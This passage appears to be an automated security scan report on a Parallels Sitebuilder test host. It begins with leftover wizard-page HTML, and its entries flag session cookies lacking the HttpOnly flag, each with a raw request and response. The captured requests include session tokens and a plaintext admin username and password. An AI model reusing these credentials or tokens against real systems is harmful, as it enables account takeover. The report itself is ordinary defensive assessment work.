<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Start');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Start"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_aleft.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Edit');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text"></div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Start&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content"><table border="0" cellpadding="0" cellspacing="0" style="height: 100%; width:100%" align="center"><tr><td style="vertical-align: top; padding: 10px; height: 100%;" align="center"><table class="sb-start-table" cellpadding="6" cellspacing="0" style="width: 100%; height: 100%;" border="0"><tr><td style="width: 100%; height: 100%"><table border="0" cellpadding="0" cellspacing="0" style="width: 100%; height: 100%" class="sb-start-panel">
<tr><td style="padding: 10px 10px 0px 10px">
<span class="sb-family-title">Select the type of site you would like to create.</span><br><span class="sb-text">After you have selected the type of site, click Next at the right bottom corner of the screen.</span>
</td></tr>
<tr><td align="center" style="padding: 10px 10px 0px 10px; vertical-align: top">
<input type="hidden" name="siteFamilia" id="siteFamilia" value="generic"><script type="text/javascript" src="/js/Wizard/SiteFamilies.js?5.0.0.2009110318"></script><script language="JavaScript" type="text/javascript">
                                               siteFamilies = new SiteFamilies('siteFamilia');
                                               siteFamilies.imageActive='/skins/WinXPReloadedCompact/images/check_active.gif';
                                               siteFamilies.imageHighLight='/skins/WinXPReloadedCompact/images/check_notactive.gif';
                                               siteFamilies.imageDisabled='/skins/WinXPReloadedCompact/images/check_disabled.gif';
                                               siteFamilies.colorActive='#FE4518';
                                               siteFamilies.colorHighLight='#909090';
                                               siteFamilies.colorDisabled='#E3E3E3';
                                           </script><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;width:100%;border-collapse:collapse;">
<tr><td style="border-width: 0px; width: 100%; padding-bottom: 10px;"><table width="100%" cellspacing="5" cellpadding="0" border="0" style="border: solid 2px #FE4518; background-color: #FFFFFF" onclick="siteFamilies.activate(this);" onmouseover="siteFamilies.highLightOn(this);" onmouseout="siteFamilies.highLightOff(this);" title="Create your site. After you select the option, click Next."><tr>
<td><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/sitefamily_generic.gif"></td>
<td align="left" width="100%" style="padding: 0px 10px 0px 30px;">
<span class="sb-family-title">Create your site</span><br><span class="sb-text">Create a web site from scratch choosing from a full set of available design and functional presets - pages and page sets, design templates, functional modules (including blog and image gallery) - which you can arrange according to your objectives and preferences.</span>
</td>
<td style="padding-right: 10px"><img src="/skins/WinXPReloadedCompact/images/check_active.gif" align="absmiddle" style="border-width:0px;" id="DataListSiteFamily_generic"></td>
</tr></table></td></tr>
<tr><td style="border-width: 0px; width: 100%; padding-bottom: 10px;"><table width="100%" cellspacing="5" cellpadding="0" border="0" style="border: solid 2px #E3E3E3; background-color: #FFFFFF; cursor: pointer;" onclick="siteFamilies.activate(this);" onmouseover="siteFamilies.highLightOn(this);" onmouseout="siteFamilies.highLightOff(this);" title="Create your blog. After you select the option, click Next."><tr>
<td><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/sitefamily_blog.gif"></td>
<td align="left" width="100%" style="padding: 0px 10px 0px 30px;">
<span class="sb-family-title">Create your blog</span><br><span class="sb-text">Create a dedicated blog site quickly and easily using the offered set of Site Editor templates. You can choose an alternative design scheme, add regular pages and functional modules to the site, and rearrange the provided site structure as you like.</span>
</td>
<td style="padding-right: 10px"><img src="/skins/WinXPReloadedCompact/images/check_disabled.gif" align="absmiddle" style="border-width:0px;" id="DataListSiteFamily_blog"></td>
</tr></table></td></tr>
<tr><td style="border-width: 0px; width: 100%; padding-bottom: 10px;"><table width="100%" cellspacing="5" cellpadding="0" border="0" style="border: solid 2px #E3E3E3; background-color: #FFFFFF; cursor: pointer;" onclick="siteFamilies.activate(this);" onmouseover="siteFamilies.highLightOn(this);" onmouseout="siteFamilies.highLightOff(this);" title="Create your photogallery. After you select the option, click Next."><tr>
<td><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/sitefamily_photogallery.gif"></td>
<td align="left" width="100%" style="padding: 0px 10px 0px 30px;">
<span class="sb-family-title">Create your photogallery</span><br><span class="sb-text">Create and publish your photo- or image gallery on the web. You have the same options to configure and personalize your site by adding or removing pages, applying design templates, and introducing additional functional modules.</span>
</td>
<td style="padding-right: 10px"><img src="/skins/WinXPReloadedCompact/images/check_disabled.gif" align="absmiddle" style="border-width:0px;" id="DataListSiteFamily_photogallery"></td>
</tr></table></td></tr>
</table>
<script language="JavaScript" type="text/javascript">
       siteFamilies.register('generic', 'DataListSiteFamily_generic');
   
       siteFamilies.register('blog', 'DataListSiteFamily_blog');
   
       siteFamilies.register('photogallery', 'DataListSiteFamily_photogallery');
   </script>
</td></tr>
</table></td></tr></table></td></tr></table></td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr><td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Design');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_start_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td></tr></table></td>
</tr></table></td></tr></table></td></tr>
</table></form>
</body>
</html>

3.22. http://vulnerarable.plesk.smb.10.2.0.site:2006/custom/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /custom/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /custom/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fcustom%2F
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:41:01 GMT
Connection: close


3.23. http://vulnerarable.plesk.smb.10.2.0.site:2006/external_login.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /external_login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /external_login.php HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US
Content-Length: 111

SiteID=78806f0057ebcbb04597bd12795bd6a6&Login=admin&Password=Nose1Dive&Skin=WinXPReloadedCompact&Language=en-US

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit?siteId=78806f0057ebcbb04597bd12795bd6a6
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:01 GMT
Connection: close


3.24. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fbullet.gif%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:05:57 GMT
Connection: close


3.25. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fheader.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:59 GMT
Connection: close


3.26. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fhleft.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:54 GMT
Connection: close


3.27. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
